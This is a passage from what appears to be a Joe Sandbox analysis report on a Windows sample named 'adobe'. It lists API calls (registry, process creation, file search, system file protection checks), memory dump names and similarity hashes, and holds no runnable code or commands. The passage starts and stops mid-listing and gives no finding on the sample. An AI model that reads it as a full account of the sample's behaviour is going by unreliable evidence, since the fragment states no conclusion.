• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: Window$EnumLongWindows
• String ID: lAB
• API String ID: 4191631535-3476862382
• Opcode ID: ac83dcd26946572d973140af976460ec6b841e514006ae286109fe1e17b4d41b
• Instruction ID: d29b09d819a87149adbd2d005cf1232ad5b3f4e75eba8ff45bdb535110d2bb0d
• Opcode Fuzzy Hash: ac83dcd26946572d973140af976460ec6b841e514006ae286109fe1e17b4d41b
• Instruction Fuzzy Hash: 3C115E70700610ABDB109F28DC85F5A77E8EB04725F50026AF9A49B2E7C378DD40CB59
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • RtlInitializeCriticalSection.KERNEL32(0049A420,00000000,00401A82,?,?,0040222E,02399EC4,000030C8,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                                                                                          • RtlEnterCriticalSection.KERNEL32(0049A420,0049A420,00000000,00401A82,?,?,0040222E,02399EC4,000030C8,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                                                                                          • LocalAlloc.KERNEL32(00000000,00000FF8,0049A420,00000000,00401A82,?,?,0040222E,02399EC4,000030C8,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                                                                                          • RtlLeaveCriticalSection.KERNEL32(0049A420,00401A89,00000000,00401A82,?,?,0040222E,02399EC4,000030C8,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                                                                                          • String ID: t<t
                                                                                                                                                          • API String ID: 730355536-2283984196
                                                                                                                                                          • Opcode ID: 5e2eb2496afd3fc4c16b730b74e1b05e66d96082c0f1b154e12a188d47f45e1b
                                                                                                                                                          • Instruction ID: b5067cfae5201e79e85213ffc863b03902d2ba9507e13bed97c350dada6f2a02
                                                                                                                                                          • Opcode Fuzzy Hash: 5e2eb2496afd3fc4c16b730b74e1b05e66d96082c0f1b154e12a188d47f45e1b
                                                                                                                                                          • Instruction Fuzzy Hash: 9C01C0706442405EFB19AB69980A7263ED4D79574CF11803BF840A6AF1CAFC48A0CBAF
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • RegDeleteKeyA.ADVAPI32(00000000,00000000), ref: 0042DD78
                                                                                                                                                          • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,?,00000000,0042DF13,00000000,0042DF2B,?,?,?,?,00000006,?,00000000,00495ECB), ref: 0042DD93
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042DD99
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressDeleteHandleModuleProc
                                                                                                                                                          • String ID: RegDeleteKeyExA$advapi32.dll
                                                                                                                                                          • API String ID: 588496660-1846899949
                                                                                                                                                          • Opcode ID: a1b10dafa016cc2537d85744fe8f18faa0a04b53368911ce0fd196557ecab751
                                                                                                                                                          • Instruction ID: 8fc99b955978393d7b704f32c9200af3e348b3abe20e6a9a0cbb7a4975712069
                                                                                                                                                          • Opcode Fuzzy Hash: a1b10dafa016cc2537d85744fe8f18faa0a04b53368911ce0fd196557ecab751
                                                                                                                                                          • Instruction Fuzzy Hash: AFE022F0B91A30AAC72023A9BC4AFA32B28CF60725F985137F081B51D182BC0C40CE9C
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • SetActiveWindow.USER32(?,?,00000000,00481965,?,?,00000001,?), ref: 00481761
                                                                                                                                                          • SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 004817D6
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ActiveChangeNotifyWindow
                                                                                                                                                          • String ID: $Need to restart Windows? %s
                                                                                                                                                          • API String ID: 1160245247-4200181552
                                                                                                                                                          • Opcode ID: 90a9701301ea6d6e270970a3c1a491c7c2ea0bab8356092fbe10affc47922363
                                                                                                                                                          • Instruction ID: 258ae82630cccce1ed416badf84f61652156c92a9ac7b4db40c87d24fe756750
                                                                                                                                                          • Opcode Fuzzy Hash: 90a9701301ea6d6e270970a3c1a491c7c2ea0bab8356092fbe10affc47922363
                                                                                                                                                          • Instruction Fuzzy Hash: 4C9192746002449FCB10FB69E986B9E77E5EF45308F1444BBE8109B372DB78A906CB5A
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0042C7D0: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C7F4
                                                                                                                                                          • GetLastError.KERNEL32(00000000,0046EE21,?,?,0049B178,00000000), ref: 0046ECFE
                                                                                                                                                          • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 0046ED78
                                                                                                                                                          • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 0046ED9D
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ChangeNotify$ErrorFullLastNamePath
                                                                                                                                                          • String ID: Creating directory: %s
                                                                                                                                                          • API String ID: 2451617938-483064649
                                                                                                                                                          • Opcode ID: f2326d96bf580de45446b3a88e0ed9ef350abc6dd031fbc90e7b757120d0fa20
                                                                                                                                                          • Instruction ID: e286108a59dfd36e0898e5c3768873ff56d0638af642643f1fdc10795f0860a6
                                                                                                                                                          • Opcode Fuzzy Hash: f2326d96bf580de45446b3a88e0ed9ef350abc6dd031fbc90e7b757120d0fa20
                                                                                                                                                          • Instruction Fuzzy Hash: D0512274E00258ABDB01DFA6C582BDEB7F5AF49304F5085AAF800B7382D7795E04CB59
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SfcIsFileProtected), ref: 004543AE
                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,00454474), ref: 00454418
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressByteCharMultiProcWide
                                                                                                                                                          • String ID: SfcIsFileProtected$sfc.dll
                                                                                                                                                          • API String ID: 2508298434-591603554
                                                                                                                                                          • Opcode ID: 17c6a901ef2fc40f22a20c8d9f0c5c0f97a481f64c1e45672719aa537b03b759
                                                                                                                                                          • Instruction ID: 02c15e4a31af94c42cf1f3a5d465fde73ea199283f03605d329b87cd975f2ee4
                                                                                                                                                          • Opcode Fuzzy Hash: 17c6a901ef2fc40f22a20c8d9f0c5c0f97a481f64c1e45672719aa537b03b759
                                                                                                                                                          • Instruction Fuzzy Hash: B741A770A003189BEB10DB55DC85B9E77B8AB45309F5081B7E808A7293D7785F89CE5D
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • GetClassInfoA.USER32(00400000,?,?), ref: 0041648F
                                                                                                                                                          • UnregisterClassA.USER32(?,00400000), ref: 004164BB
                                                                                                                                                          • RegisterClassA.USER32(?), ref: 004164DE
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: Class$InfoRegisterUnregister
• String ID: @
• API String ID: 3749476976-2766056989
• Opcode ID: 428ee8849785124313965255ef08df1f1b4e8ea786c68e07a6e4b7e1ebd76e39
• Instruction ID: 7a3367fafc14ce9f55c1362753e540655f5bf3363bc6823d1bccf2610c9c9706
• Opcode Fuzzy Hash: 428ee8849785124313965255ef08df1f1b4e8ea786c68e07a6e4b7e1ebd76e39
• Instruction Fuzzy Hash: 8F3180706042009BD760EF68C881B9B77E5AB85308F00457FF945DB392DB3ED9448B6A
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00453183,?,?,00000000,0049A628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004530DA
• GetLastError.KERNEL32(00000000,00000000,?,00000000,00453183,?,?,00000000,0049A628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004530E3
Strings
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: CreateDirectoryErrorLast
• String ID: (rI$.tmp
• API String ID: 1375471231-3138636223
• Opcode ID: c5dcbd4b090b64380de409b5e525eb1e0e06c0e183a767b6dafd3be885647caf
• Instruction ID: fdd405cf0ee7d7e8aaee19412d05bb9b19e2fd4e23256c5b47f735cbad2150ad
• Opcode Fuzzy Hash: c5dcbd4b090b64380de409b5e525eb1e0e06c0e183a767b6dafd3be885647caf
• Instruction Fuzzy Hash: C4211575A002089BDB01EFA5C8529DFB7B9EB48305F50457BE901B7382DA7C9F058BA9
Uniqueness

Uniqueness Score: -1.00%

APIs
• 74D41520.VERSION(00000000,?,?,?,n_I), ref: 00451BA0
• 74D41500.VERSION(00000000,?,00000000,?,00000000,00451C1B,?,00000000,?,?,?,n_I), ref: 00451BCD
• 74D41540.VERSION(?,00451C44,?,?,00000000,?,00000000,?,00000000,00451C1B,?,00000000,?,?,?,n_I), ref: 00451BE7
Strings
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: D41500D41520D41540
• String ID: n_I
• API String ID: 2153611984-2401994647
• Opcode ID: e4d161465f036a103ebb289189d3cd0f170a5630909247fb2ee4af93fb68b9e6
• Instruction ID: 4f8324d0d9967553cfa4e2087f5e207790f68935e4380d12614fc4779ec75e8b
• Opcode Fuzzy Hash: e4d161465f036a103ebb289189d3cd0f170a5630909247fb2ee4af93fb68b9e6
• Instruction Fuzzy Hash: 5F219571A00248AFDB02DAA98C41EAFB7FCEB49301F55447AF800E3352D6799E04C769
Uniqueness

Uniqueness Score: -1.00%

APIs
• 73A1A570.USER32(00000000,?,00000000,00000000,0044ACE1,?,{H,?,?), ref: 0044AC55
• SelectObject.GDI32(?,00000000), ref: 0044AC78
• 73A1A480.USER32(00000000,?,0044ACB8,00000000,0044ACB1,?,00000000,?,00000000,00000000,0044ACE1,?,{H,?,?), ref: 0044ACAB
Strings
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: A480A570ObjectSelect
• String ID: {H
• API String ID: 1230475511-1783425356
• Opcode ID: 3ef627e0227541c160f5483f4411feea27e9077cc7b2a08faaabc4aa9260d785
• Instruction ID: 3b5f26ead791ea6387a249f2cdaddc54e41ca9264cf2fbaff888b01415335cc3
• Opcode Fuzzy Hash: 3ef627e0227541c160f5483f4411feea27e9077cc7b2a08faaabc4aa9260d785
• Instruction Fuzzy Hash: CA21B670E44248AFEB01DFA5C885B9F7BB9EB48304F41807AF500E7281D77C9950CB6A
Uniqueness

Uniqueness Score: -1.00%

APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0044A9A0,?,{H,?,?), ref: 0044A972
• DrawTextW.USER32(?,?,00000000,?,?), ref: 0044A985
• DrawTextA.USER32(?,00000000,00000000,?,?), ref: 0044A9B9
Strings
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: DrawText$ByteCharMultiWide
• String ID: {H
• API String ID: 65125430-1783425356
• Opcode ID: 18b169e245813401a0f41c477646881a2abd9a6b0717883cb275958d94a96fcb
• Instruction ID: 8b0288b9d3461177b0e2011e4a6e3c0ecae8d00baf86e8e824f1a66b6306016d
• Opcode Fuzzy Hash: 18b169e245813401a0f41c477646881a2abd9a6b0717883cb275958d94a96fcb
• Instruction Fuzzy Hash: 0E11B6B27446047FEB10DAAA9C82E6FB7ECEB49724F10417BF504E7290D6389E018669
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateProcessA.KERNEL32(00000000,00000000,?,?,puE,00000000,XuE,?,?,?,00000000,00451ED2,?,?,?,00000001), ref: 00451EAC
• GetLastError.KERNEL32(00000000,00000000,?,?,puE,00000000,XuE,?,?,?,00000000,00451ED2,?,?,?,00000001), ref: 00451EB4
Strings
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: CreateErrorLastProcess
• String ID: XuE$puE
• API String ID: 2919029540-1777687408
• Opcode ID: 0669253b94e97d79e5e553ecbd5c422723894a7d9947c46f5925aa1b9a2f36a5
• Instruction ID: 005b97d9f3d6fc2d61eebea25250fab46ca672ee3877172d18c79183b21e8564
• Opcode Fuzzy Hash: 0669253b94e97d79e5e553ecbd5c422723894a7d9947c46f5925aa1b9a2f36a5
• Instruction Fuzzy Hash: 1B113C76600208AF8B50DEADDC41EEB77ECEB4D310B51456ABD18E3251D634AD148B64
Uniqueness

Uniqueness Score: -1.00%

APIs
• SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EC39
  • Part of subcall function 0042D890: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8A3
  • Part of subcall function 0042E2BC: SetErrorMode.KERNEL32(00008000), ref: 0042E2C6
  • Part of subcall function 0042E2BC: LoadLibraryA.KERNEL32(00000000,00000000,0042E310,?,00000000,0042E32E,?,00008000), ref: 0042E2F5
• GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EC1C
Strings
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: AddressAutoCompleteDirectoryErrorLibraryLoadModeProcSystem
• String ID: SHAutoComplete$shlwapi.dll
• API String ID: 395431579-1506664499
• Opcode ID: b6299dd789516675415794c1050a72ed988892d12d41c5adc8c3ba5c36fbba6e
• Instruction ID: 0a6e4b60a995cf3844b8ce041fcdcfda7059b8caa19e1ea1d7c6064077637db5
• Opcode Fuzzy Hash: b6299dd789516675415794c1050a72ed988892d12d41c5adc8c3ba5c36fbba6e
• Instruction Fuzzy Hash: DF115130B00618ABDB11EBA3EC46B9E7BACDB55704F904477F440A6291DB7C9E05865D
Uniqueness

Uniqueness Score: -1.00%

APIs
• Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,[!H,?,00000001,?,?,0048215B,?,00000001,00000000), ref: 0042DD60
• RegCloseKey.ADVAPI32(?,00454FA7,?,00000001,00000000), ref: 00454F9A
Strings
• PendingFileRenameOperations, xrefs: 00454F6C
• SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00454F48
• PendingFileRenameOperations2, xrefs: 00454F7B
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: CloseOpen
• String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager
• API String ID: 47109696-2115312317
• Opcode ID: 1d1014fa8df93e57a927e8a353b20bc7fc4ba26612649d36a04e0652a89df34a
• Instruction ID: 4e36f23c0afdd0c8c7c5a5796e308a2b8506757bff9ef38b92e62c150fb0ca3e
• Opcode Fuzzy Hash: 1d1014fa8df93e57a927e8a353b20bc7fc4ba26612649d36a04e0652a89df34a
• Instruction Fuzzy Hash: 67F062322142446FD70596AAEC13E1B73EEE7C471DFA04466F800DB582DA79AD94962C
Uniqueness

Uniqueness Score: -1.00%

APIs
• FindNextFileA.KERNEL32(000000FF,?,00000000,00471449,?,00000000,?,0049B178,00000000,00471617,?,00000000,?,00000000,?,004717E5), ref: 00471425
• FindClose.KERNEL32(000000FF,00471450,00471449,?,00000000,?,0049B178,00000000,00471617,?,00000000,?,00000000,?,004717E5,?), ref: 00471443
• FindNextFileA.KERNEL32(000000FF,?,00000000,0047156B,?,00000000,?,0049B178,00000000,00471617,?,00000000,?,00000000,?,004717E5), ref: 00471547
• FindClose.KERNEL32(000000FF,00471572,0047156B,?,00000000,?,0049B178,00000000,00471617,?,00000000,?,00000000,?,004717E5,?), ref: 00471565
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: Find$CloseFileNext
• String ID:
• API String ID: 2066263336-0
• Opcode ID: d6d041cb8f7c491ce77016926a25bb81e4023aa25833d9b76f2ffef6629c5ed7
• Instruction ID: 0f4871d982279d9997c19f03ad0fbebdd4117ece3c196d883e63fe27161a8bf3
• Opcode Fuzzy Hash: d6d041cb8f7c491ce77016926a25bb81e4023aa25833d9b76f2ffef6629c5ed7
• Instruction Fuzzy Hash: 1FB12F3490425D9FCF11DFA9C881ADEBBB9FF49304F5081A6E848B7261D7389A45CF54
Uniqueness

Uniqueness Score: -1.00%

APIs
• FindNextFileA.KERNEL32(000000FF,?,?,?,?,00000000,0047E72D,?,00000000,00000000,?,?,0047F94A,?,?,00000000), ref: 0047E5DA
• FindClose.KERNEL32(000000FF,000000FF,?,?,?,?,00000000,0047E72D,?,00000000,00000000,?,?,0047F94A,?,?), ref: 0047E5E7
• FindNextFileA.KERNEL32(000000FF,?,00000000,0047E700,?,?,?,?,00000000,0047E72D,?,00000000,00000000,?,?,0047F94A), ref: 0047E6DC
• FindClose.KERNEL32(000000FF,0047E707,0047E700,?,?,?,?,00000000,0047E72D,?,00000000,00000000,?,?,0047F94A,?), ref: 0047E6FA
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: Find$CloseFileNext
• String ID:
• API String ID: 2066263336-0
• Opcode ID: 303a35a3064e31ac026ab8e7c7805e0374f6944332f92ee79bd9a44763869d60
• Instruction ID: 28583fff67185971eef34c5c69b0e551aac517942e8b674ad10e64284e68e1a2
• Opcode Fuzzy Hash: 303a35a3064e31ac026ab8e7c7805e0374f6944332f92ee79bd9a44763869d60
• Instruction Fuzzy Hash: D4515F70900648AFCB10EFA6CC45ADEB7B8EB48319F5085EAE408E7351D6389F45CF54
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetMenu.USER32(00000000), ref: 00421371
• SetMenu.USER32(00000000,00000000), ref: 0042138E
• SetMenu.USER32(00000000,00000000), ref: 004213C3
• SetMenu.USER32(00000000,00000000), ref: 004213DF
Memory Dump Source
